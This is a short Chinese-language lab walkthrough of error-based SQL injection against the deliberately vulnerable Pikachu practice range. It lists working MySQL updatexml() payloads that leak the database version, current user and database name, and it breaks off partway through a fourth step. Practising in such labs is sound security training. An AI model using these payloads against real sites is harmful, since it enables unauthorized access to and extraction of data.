Pikachu靶场 报错SQL注入实战测试

使用 搜索型注入

一、爆 数据库版本信息

' and updatexml(1 , concat('<<' , (select version()) , '>>') , 1)#
' and updatexml(1 , concat("~" , (SELECT @@version) , "~") , 1) #
' and updatexml(1 , concat(0x7e , (SELECT @@version) , 0x7e) , 1) #

   Pikachu靶场 报错SQL注入实战测试_第1张图片                                  

注 :这里为什么不直接写~,而是写成了16进制呢,因为~本身为字符串,如果直接写~,需要用引号引起来,如果用单引号的话,势必会和我们前面闭合用的单引号有些冲突,所以只能用双引号,所以还需要写双引号,比较麻烦,并且如果别人后台对引号做了限制的话,我们用引号就会注入失败。

 

二、爆 数据库当前用户

' and updatexml(1 , concat(0x7e , (SELECT user()) , 0x7e) , 1) #

Pikachu靶场 报错SQL注入实战测试_第2张图片

 

三、爆 数据库

' and updatexml(1 , concat(0x7e , (SELECT database()) , 0x7e) , 1) #

Pikachu靶场 报错SQL注入实战测试_第3张图片

四、爆

你可能感兴趣的:(sql,数据库)